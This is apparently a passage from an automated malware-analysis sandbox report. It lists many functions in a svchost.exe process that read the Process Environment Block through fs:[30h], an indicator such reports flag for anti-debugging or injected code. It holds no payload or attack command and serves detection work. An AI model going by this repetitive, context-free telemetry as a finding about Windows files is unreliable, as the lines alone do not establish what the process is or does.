                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E3F0 mov eax, dword ptr fs:[00000030h]7_2_0364E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036663FF mov eax, dword ptr fs:[00000030h]7_2_036663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC3CD mov eax, dword ptr fs:[00000030h]7_2_036EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A3C0 mov eax, dword ptr fs:[00000030h]7_2_0363A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036383C0 mov eax, dword ptr fs:[00000030h]7_2_036383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B63C0 mov eax, dword ptr fs:[00000030h]7_2_036B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE3DB mov eax, dword ptr fs:[00000030h]7_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE3DB mov eax, dword ptr fs:[00000030h]7_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE3DB mov ecx, dword ptr fs:[00000030h]7_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE3DB mov eax, dword ptr fs:[00000030h]7_2_036DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D43D4 mov eax, dword ptr fs:[00000030h]7_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D43D4 mov eax, dword ptr fs:[00000030h]7_2_036D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362E388 mov eax, dword ptr fs:[00000030h]7_2_0362E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365438F mov eax, dword ptr fs:[00000030h]7_2_0365438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03628397 mov eax, dword ptr fs:[00000030h]7_2_03628397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634260 mov eax, dword ptr fs:[00000030h]7_2_03634260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362826B mov eax, dword ptr fs:[00000030h]7_2_0362826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E0274 mov eax, dword ptr fs:[00000030h]7_2_036E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B8243 mov eax, dword ptr fs:[00000030h]7_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B8243 mov ecx, dword ptr fs:[00000030h]7_2_036B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A250 mov eax, dword ptr fs:[00000030h]7_2_0362A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636259 mov eax, dword ptr fs:[00000030h]7_2_03636259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EA250 mov eax, dword ptr fs:[00000030h]7_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EA250 mov eax, dword ptr fs:[00000030h]7_2_036EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362823B mov eax, dword ptr fs:[00000030h]7_2_0362823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402E1 mov eax, dword ptr fs:[00000030h]7_2_036402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363A2C3 mov eax, dword ptr fs:[00000030h]7_2_0363A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036402A0 mov eax, dword ptr fs:[00000030h]7_2_036402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov ecx, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C62A0 mov eax, dword ptr fs:[00000030h]7_2_036C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366E284 mov eax, dword ptr fs:[00000030h]7_2_0366E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B0283 mov eax, dword ptr fs:[00000030h]7_2_036B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov ecx, dword ptr fs:[00000030h]7_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C4144 mov eax, dword ptr fs:[00000030h]7_2_036C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C156 mov eax, dword ptr fs:[00000030h]7_2_0362C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C8158 mov eax, dword ptr fs:[00000030h]7_2_036C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03636154 mov eax, dword ptr fs:[00000030h]7_2_03636154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660124 mov eax, dword ptr fs:[00000030h]7_2_03660124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov eax, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DE10E mov ecx, dword ptr fs:[00000030h]7_2_036DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov ecx, dword ptr fs:[00000030h]7_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036DA118 mov eax, dword ptr fs:[00000030h]7_2_036DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F0115 mov eax, dword ptr fs:[00000030h]7_2_036F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_037061E5 mov eax, dword ptr fs:[00000030h]7_2_037061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036601F8 mov eax, dword ptr fs:[00000030h]7_2_036601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F61C3 mov eax, dword ptr fs:[00000030h]7_2_036F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE1D0 mov eax, dword ptr fs:[00000030h]7_2_036AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03670185 mov eax, dword ptr fs:[00000030h]7_2_03670185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036EC188 mov eax, dword ptr fs:[00000030h]7_2_036EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D4180 mov eax, dword ptr fs:[00000030h]7_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D4180 mov eax, dword ptr fs:[00000030h]7_2_036D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B019F mov eax, dword ptr fs:[00000030h]7_2_036B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A197 mov eax, dword ptr fs:[00000030h]7_2_0362A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0365C073 mov eax, dword ptr fs:[00000030h]7_2_0365C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03632050 mov eax, dword ptr fs:[00000030h]7_2_03632050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B6050 mov eax, dword ptr fs:[00000030h]7_2_036B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A020 mov eax, dword ptr fs:[00000030h]7_2_0362A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C020 mov eax, dword ptr fs:[00000030h]7_2_0362C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C6030 mov eax, dword ptr fs:[00000030h]7_2_036C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4000 mov ecx, dword ptr fs:[00000030h]7_2_036B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D2000 mov eax, dword ptr fs:[00000030h]7_2_036D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E016 mov eax, dword ptr fs:[00000030h]7_2_0364E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362A0E3 mov ecx, dword ptr fs:[00000030h]7_2_0362A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036380E9 mov eax, dword ptr fs:[00000030h]7_2_036380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B60E0 mov eax, dword ptr fs:[00000030h]7_2_036B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0362C0F0 mov eax, dword ptr fs:[00000030h]7_2_0362C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036720F0 mov ecx, dword ptr fs:[00000030h]7_2_036720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B20DE mov eax, dword ptr fs:[00000030h]7_2_036B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036C80A8 mov eax, dword ptr fs:[00000030h]7_2_036C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov eax, dword ptr fs:[00000030h]7_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F60B8 mov ecx, dword ptr fs:[00000030h]7_2_036F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363208A mov eax, dword ptr fs:[00000030h]7_2_0363208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638770 mov eax, dword ptr fs:[00000030h]7_2_03638770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640770 mov eax, dword ptr fs:[00000030h]7_2_03640770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov esi, dword ptr fs:[00000030h]7_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366674D mov eax, dword ptr fs:[00000030h]7_2_0366674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630750 mov eax, dword ptr fs:[00000030h]7_2_03630750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BE75D mov eax, dword ptr fs:[00000030h]7_2_036BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672750 mov eax, dword ptr fs:[00000030h]7_2_03672750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B4755 mov eax, dword ptr fs:[00000030h]7_2_036B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C720 mov eax, dword ptr fs:[00000030h]7_2_0366C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov ecx, dword ptr fs:[00000030h]7_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366273C mov eax, dword ptr fs:[00000030h]7_2_0366273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AC730 mov eax, dword ptr fs:[00000030h]7_2_036AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C700 mov eax, dword ptr fs:[00000030h]7_2_0366C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03630710 mov eax, dword ptr fs:[00000030h]7_2_03630710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03660710 mov eax, dword ptr fs:[00000030h]7_2_03660710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036527ED mov eax, dword ptr fs:[00000030h]7_2_036527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036BE7E1 mov eax, dword ptr fs:[00000030h]7_2_036BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036347FB mov eax, dword ptr fs:[00000030h]7_2_036347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363C7C0 mov eax, dword ptr fs:[00000030h]7_2_0363C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B07C3 mov eax, dword ptr fs:[00000030h]7_2_036B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036307AF mov eax, dword ptr fs:[00000030h]7_2_036307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036E47A0 mov eax, dword ptr fs:[00000030h]7_2_036E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036D678E mov eax, dword ptr fs:[00000030h]7_2_036D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036F866E mov eax, dword ptr fs:[00000030h]7_2_036F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A660 mov eax, dword ptr fs:[00000030h]7_2_0366A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03662674 mov eax, dword ptr fs:[00000030h]7_2_03662674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364C640 mov eax, dword ptr fs:[00000030h]7_2_0364C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364E627 mov eax, dword ptr fs:[00000030h]7_2_0364E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03666620 mov eax, dword ptr fs:[00000030h]7_2_03666620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03668620 mov eax, dword ptr fs:[00000030h]7_2_03668620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0363262C mov eax, dword ptr fs:[00000030h]7_2_0363262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE609 mov eax, dword ptr fs:[00000030h]7_2_036AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0364260B mov eax, dword ptr fs:[00000030h]7_2_0364260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03672619 mov eax, dword ptr fs:[00000030h]7_2_03672619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036AE6F2 mov eax, dword ptr fs:[00000030h]7_2_036AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036B06F1 mov eax, dword ptr fs:[00000030h]7_2_036B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366A6C7 mov eax, dword ptr fs:[00000030h]7_2_0366A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366C6A6 mov eax, dword ptr fs:[00000030h]7_2_0366C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_036666B0 mov eax, dword ptr fs:[00000030h]7_2_036666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634690 mov eax, dword ptr fs:[00000030h]7_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03634690 mov eax, dword ptr fs:[00000030h]7_2_03634690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366656A mov eax, dword ptr fs:[00000030h]7_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366656A mov eax, dword ptr fs:[00000030h]7_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_0366656A mov eax, dword ptr fs:[00000030h]7_2_0366656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638550 mov eax, dword ptr fs:[00000030h]7_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03638550 mov eax, dword ptr fs:[00000030h]7_2_03638550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03640535 mov eax, dword ptr fs:[00000030h]7_2_03640535
